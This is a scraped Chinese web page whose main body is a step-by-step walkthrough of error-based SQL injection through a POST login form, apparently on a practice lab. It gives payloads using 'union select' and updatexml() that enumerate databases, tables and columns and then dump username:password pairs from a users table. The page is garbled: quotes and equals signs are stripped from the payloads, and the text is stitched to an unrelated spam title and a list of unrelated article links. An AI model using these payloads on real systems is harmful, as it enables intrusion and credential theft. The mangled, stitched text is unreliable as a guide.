当前位置: 首页 > news >正文

做美食直播哪个网站好在您的网站首页添加标签

做美食直播哪个网站好,在您的网站首页添加标签,论坛模板建站,微信网站建设知识post提交报错注入 闭合方式及注入点 利用hackbar进行注入#xff0c;构造post语句 unameaaapasswdbbbSubmitSubmit 页面报错#xff0c;根据分析#xff0c;闭合方式. 确定列数 构造 unameaaa or 11 # passwdbbbSubmitSubmit 确定存在注…post提交报错注入 闭合方式及注入点 利用hackbar进行注入构造post语句 unameaaapasswdbbbSubmitSubmit 页面报错根据分析闭合方式. 确定列数 构造 unameaaa or 11 # passwdbbbSubmitSubmit 确定存在注入 unameaaa order by 3 # passwdbbbSubmitSubmit 有报错 unameaaa order by 2 # passwdbbbSubmitSubmit 无报错列数2 回显位置 unameaaa union select 1,2 # passwdbbbSubmitSubmit 发现页面没有回显想到前面 存在报错想到报错注入 使用updatexml()函数来进行报错注入 查询数据库与版本等 unameaaa union select 1,updatexml(1,concat(‘~’,(select database())),3) # passwdbbbSubmitSubmit 数据库名unameaaa union select 1,updatexml(1,concat(‘~’,(select version())),3) # passwdbbbSubmitSubmit 版本 爆出所有数据库 unameaaa union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 5,1)),3) # passwdbbbSubmitSubmit 通过修改limit函数的值来查询所有的数据库名 爆出所有表名 unameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 2,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1)),3) # passwdbbbSubmitSubmit 得到users表 爆出列名 unameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 1,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 2,1)),3) # passwdbbbSubmitSubmit 得到列id,username,password 爆出数据 unameaaa union select 1,updatexml(1,concat(‘~’,(select concat(username,‘:’,password) from security.users limit 0,1)),3) # passwdbbbSubmitSubmit 修改0的值就可以得到所有的数据 完成
http://www.w-s-a.com/news/42236/

相关文章:

  • discuz 做门户网站wordpress怎么添加图片不显示图片
  • 东营网站建设方案范文百度应用搜索
  • 网站 常见推广js代码放wordpress哪里
  • 靖江网站开发徐州住房和城乡建设局网站
  • 南宁网站建设公司如何为老板打造网站赚钱的wordpress optimizer
  • 做微商好还是开网站好网站网络推广
  • 网站建设岗位所需技能泊头网站优化
  • 企业网站建设是什么网络营销岗位介绍
  • 网站做cdn怎么弄昆明网站seo报价
  • 拖拽网站如何建立微网站
  • 网站网站做代理微信群卖房卡南宁建站模板大全
  • 网络公司怎么优化网站百度快速排名技术培训教程
  • 建e室内设计网 周婷站长工具seo综合查询源码
  • 塔式服务器主机建网站定制美瞳网站建设
  • 网站是先解析后备案吗永久免费网站模板
  • wordpress站点演示php根据ip 跳转网站
  • 东莞市凤岗建设局网站网站开发有哪些职位
  • 企业网站手机版模板免费下载辣条网站建设书
  • 南昌网站建设维护vc 做网站源码
  • 网站动态logo怎么做织梦移动端网站怎么做
  • 三亚城乡建设局网站app下载安装官方网站
  • 公司被其它人拿来做网站郑州哪家做网站最好
  • 山东省建设厅官方网站抖音代运营业务介绍
  • 网站制作 牛商网wordpress商城 微信支付
  • 平面设计培训网站建文帝网站建设
  • python网站建设佛山乐从网站建设
  • 网站 免费 托管运营app软件大全
  • 爱网站找不到了网站设计制作要交印花税
  • 分销平台是什么意思网站如何从行为数据进行优化
  • 做网站公司职务做民俗酒店到哪些网站推荐